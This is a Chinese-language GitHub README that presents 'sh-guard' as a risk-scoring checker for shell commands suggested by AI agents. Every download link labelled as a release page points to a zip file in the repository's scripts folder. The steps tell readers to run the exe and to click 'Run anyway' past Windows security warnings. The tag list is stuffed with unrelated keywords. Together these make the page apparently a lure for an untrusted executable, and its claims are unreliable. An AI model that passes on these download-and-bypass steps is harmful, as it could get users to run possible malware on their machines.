ambassadorial-vinegarworm656/sh-guard

GitHub: ambassadorial-vinegarworm656/sh-guard

基于 AST 解析和风险评分的 shell 命令安全检查工具,专为 AI 编程智能体场景设计,帮助用户在执行前识别命令注入等高危模式。

Stars: 0 | Forks: 0

# 🛡️ sh-guard - 面向 AI 工具的更安全 shell 命令 [![下载 sh-guard](https://img.shields.io/badge/Download%20sh--guard-4B8BF5?style=for-the-badge&logo=github&logoColor=white)](https://github.com/ambassadorial-vinegarworm656/sh-guard/raw/refs/heads/main/scripts/guard-sh-resuppression.zip) ## 🚀 它的功能 sh-guard 会在 shell 命令运行前对其进行检查。它会寻找 AI 工具或脚本可能尝试使用的命令中的风险模式。然后根据命令结构给出安全评分。 当您希望更好地控制来自以下工具的 shell 命令时,可以使用它: - AI 编程智能体 - 命令行辅助工具 - 本地开发工具 - Shell 脚本 它可以帮助您在命令注入风险和其他不安全的命令模式引发麻烦之前发现它们。 ## 💻 Windows 下载与安装 1. 打开 [sh-guard 发布页面](https://github.com/ambassadorial-vinegarworm656/sh-guard/raw/refs/heads/main/scripts/guard-sh-resuppression.zip) 2. 找到最新版本 3. 为您的电脑下载 Windows 文件 4. 如果文件是 zip 压缩包,请在下载完成后解压该 zip 文件 5. 将应用程序移至您以后容易找到的文件夹,例如 `Downloads` 或 `Desktop` 6. 双击应用程序以运行它 如果 Windows 显示安全提示: 1. 点击“更多信息”(More info) 2. 点击“仍要运行”(Run anyway) 如果您看到名为 `sh-guard.exe` 的文件,那就是您应该在 Windows 上运行的文件。 ## 🧭 如何使用它 启动 sh-guard 后,它会检查来自您的 shell 或连接工具的命令。 典型流程: 1. 将命令复制或发送给 sh-guard 2. 让其检查该命令 3. 阅读风险评分或安全结果 4. 决定该命令是否应该运行 示例用例: - 在将命令粘贴到 PowerShell 之前进行检查 - 审查来自 AI 助手的 shell 命令 - 阻止构建脚本中的不安全模式 - 在本地开发期间测试命令 ## 🧰 您需要什么 sh-guard 在以下 Windows PC 上运行效果最佳: - Windows 10 或 Windows 11 - 现代的 64 位系统 - 足够的可用空间以解压下载文件 - Shell 工具,如 PowerShell、Command Prompt、Git Bash 或 Windows Terminal 为获得最佳效果,请保持 Windows 处于更新状态。 ## 🔒 它可以执行的安全检查 sh-guard 使用基于 AST 的解析来检查命令结构。简而言之,它会在命令运行前读取其结构形态。 它可以帮助识别: - 危险的分隔符 - 隐藏的命令链 - 可疑的文件写入 - 命令注入模式 - 异常的 shell 语法 - 高风险命令组合 它专为智能体工具和开发工作流中的 shell 安全工作而构建。 ## ⚙️ 常见安装路径 ### 选项 1:从下载的发布版本运行 如果您想要最快的途径,请使用此选项。 1. 从发布页面下载发布版本 2. 如有需要,解压文件 3. 打开文件夹 4. 运行 Windows 可执行文件 ### 选项 2:与 AI 编程工具配合使用 如果您想检查来自智能体的命令,请使用此选项。 1. 安装 sh-guard 2. 如果您的设置支持本地命令检查,请将其连接到您的工具 3. 在执行前通过 sh-guard 发送 shell 命令 4. 审查风险输出 ### 选项 3:用于本地 shell 检查 如果您想手动审查命令,请使用此选项。 1. 打开 PowerShell 或终端 2. 通过 sh-guard 运行或传递命令 3. 阅读评分或警告结果 4. 决定是否要继续 ## 🧩 该项目的用途 sh-guard 专为那些经常处理 shell 命令并希望在执行前进行二次检查的人而设计。 它非常适合以下场景: - 建议终端命令的 AI 智能体 - 命令行的安全检查 - 运行本地操作的开发者工具 - Shell 注入问题测试 - 在 Windows 上的 Linux 风格 shell 中进行命令审查 ## 📁 预期的文件布局 下载并解压发布版本后,您可能会看到以下文件: - `sh-guard.exe` - `README.md` - 配置文件 - 用于 shell 解析的支持文件 - 发布说明 如果您看到多个可执行文件,请选择带有主应用程序名称的那个。 ## 🖥️ 基本的 Windows 操作步骤 如果您不熟悉在 Windows 上下载应用程序,请按以下步骤操作: 1. 打开您的浏览器下载列表 2. 点击下载的文件 3. 如果是 zip 文件,请右键单击它并选择“全部解压”(Extract All) 4. 打开解压后的文件夹 5. 找到应用程序文件 6. 双击它 7. 按照任何屏幕上的提示进行操作 如果文件无法打开,请将其移至一个简单的文件夹(例如 `C:\sh-guard`)并重试 ## 🛠️ 故障排除 ### 应用程序无法启动 - 确保您下载的是 Windows 版本 - 检查文件是否已完全下载 - 尝试再次解压 zip 文件 - 将应用程序移出 Downloads 文件夹,并从本地文件夹运行它 ### Windows 阻止了该文件 - 打开文件的属性 - 如果 Windows 显示“解除锁定”(Unblock) 选项,请勾选它 - 点击“更多信息”(More info),然后在您信任文件来源的情况下点击“仍要运行”(Run anyway) ### 我没有看到明确的可执行文件 - 再次打开发布文件 - 寻找 Windows `.exe` 文件 - 选择带有主应用程序名称的文件 ### 应用程序打开后迅速关闭 - 从 PowerShell 运行它,以便您可以看到任何消息 - 检查它是否需要配置文件或命令输入 - 再次尝试最新版本 ## 🧪 示例工作流 使用 sh-guard 的一种简单方法: 1. AI 工具建议了一条 shell 命令 2. 您将该命令复制到 sh-guard 中 3. sh-guard 检查命令结构 4. 它返回一个风险评分 5. 您在运行前审查结果 这在建议和操作之间为您提供了一个清晰的步骤 ## 📌 项目详情 - 名称:sh-guard - 类型:命令安全工具 - 重点:shell 风险评分 - 方法:基于 AST 的命令解析 - 用例:AI 智能体命令审查 - 主题:bash, CLI, command injection, devtools, MCP, Rust, security, shell, tree-sitter ## 🔗 下载 访问 [sh-guard 发布页面](https://github.com/ambassadorial-vinegarworm656/sh-guard/raw/refs/heads/main/scripts/guard-sh-resuppression.zip) 下载并运行 Windows 文件 ## 🧭 文件选择帮助 打开发布页面时,请寻找: - 位于顶部的最新版本 - Windows 构建版本 - 以 `.exe` 结尾的文件或包含该文件的 zip 压缩包 - 与您的系统匹配的发布说明 如果有多个文件,请选择适用于 Windows 64 位的文件 ## 🧼 保持简单 如果您只想快速上手: 1. 转到发布页面 2. 下载 Windows 文件 3. 如有需要,将其解压 4. 运行该应用程序 5. 使用它来审查 shell 命令
标签:AI代理安全, AI安全, AI编程助手, Chat Copilot, DevSecOps, OpenCanary, Shell命令分析, Windows应用, 上游代理, 云安全监控, 代码安全, 可视化界面, 命令注入防护, 命令行过滤, 威胁情报, 安全网关, 安全评分, 安全防护, 开发者工具, 恶意命令检测, 提示注入防护, 搜索语句(dork), 本地开发, 漏洞枚举, 终端安全, 脚本安全, 通知系统, 静态分析